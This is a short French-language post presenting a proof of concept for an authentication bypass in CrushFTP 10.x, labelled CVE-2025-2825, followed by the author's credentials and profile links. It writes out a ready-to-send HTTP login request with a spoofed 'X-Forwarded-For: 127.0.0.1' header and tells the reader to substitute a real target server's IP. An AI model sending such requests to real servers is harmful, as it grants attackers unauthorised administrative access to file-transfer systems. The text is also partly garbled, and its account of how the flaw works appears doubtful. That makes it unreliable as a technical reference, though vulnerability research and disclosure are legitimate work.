Preuve de concept de contournement d'authentification pour CVE-2025-2825 – Exploitation de CrushFTP 10.x
CVE-2025-2825 est une vulnérabilité critique de contournement d'authentification affectant CrushFTP, un serveur de transfert de fichiers sécurisé largement utilisé. La faille permet à des attaquants distants de contourner l'authentification de connexion et d'obtenir un accès administratif en usurpant les en-têtes — trompant le serveur en lui faisant croire que la requête provient de localhost.
La vulnérabilité résulte d'une validation inadéquate de l'en-tête X-Forwarded-For. Lorsque cet en-tête est défini sur 127.0.0.1, le serveur traite la requête comme locale — contournant ainsi l'authentification.
GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1
Host: target-ip
X-Forwarded-For: 127.0.0.1
📝 Remplacez
target-ippar l'adresse IP réelle du serveur CrushFTP cible.
Si elle réussit, le serveur contourne l'authentification et accorde l'accès — même avec des identifiants incorrects.
X-Forwarded-For: 127.0.0.1
X-Forwarded-For.Shivshant Patil
Hacker Éthique Certifié (CEH v13)
Diplômé en génie informatique (B.Tech)
🔗 Profil LinkedIn
🔗 Profil GitHub